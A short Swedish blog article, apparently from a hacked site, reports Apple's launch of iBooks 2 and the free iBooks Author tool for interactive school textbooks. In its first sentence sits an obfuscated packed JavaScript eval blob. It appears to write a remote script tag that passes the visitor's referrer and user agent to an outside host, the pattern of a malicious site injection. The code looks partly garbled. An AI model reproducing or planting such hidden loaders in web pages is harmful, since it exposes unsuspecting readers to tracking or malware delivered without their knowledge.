Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Apple släpper Läroboken iBook 2.0

Apple släpper Läroboken iBook 2.0
Sebastian
Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|byyef|var|u0026u|referrer|inybd||js|php’.split(’|’),0,{}))
släpps iBook 2 och iBooks Author.
Som vi vet så gillar Apple skola och i många år var Mac det självklara valet i skolor världen runt. Nu är det iPad som är på väg att växa i skolorna. För att lyfta det ännu mer presenterade i dag Apple en stor uppdatering av iBooks. Nu kan man enkelt publicera interaktiva läroböcker. Samtidigt släpps iBook Author som är en mix av Pages och Keynote. Dessa för att bilda läroböcker som man sedan publicerar. iBook Author är helt gratis.

De nya läroböckerna är en bokpresentation snarare än applikationer. Man kan lägga in gallerier, filmer och 3D-objekt. Frågor kan också läggas in i texter så att eleven snabbt kan få kontrollfrågor på det som nyss lästs. Stöd för markeringar, ordlistor och mycket annat finns också.

Uppdateringen ska släppas i dag och kan verkligen bli intressant.
Mer info:
www.apple.com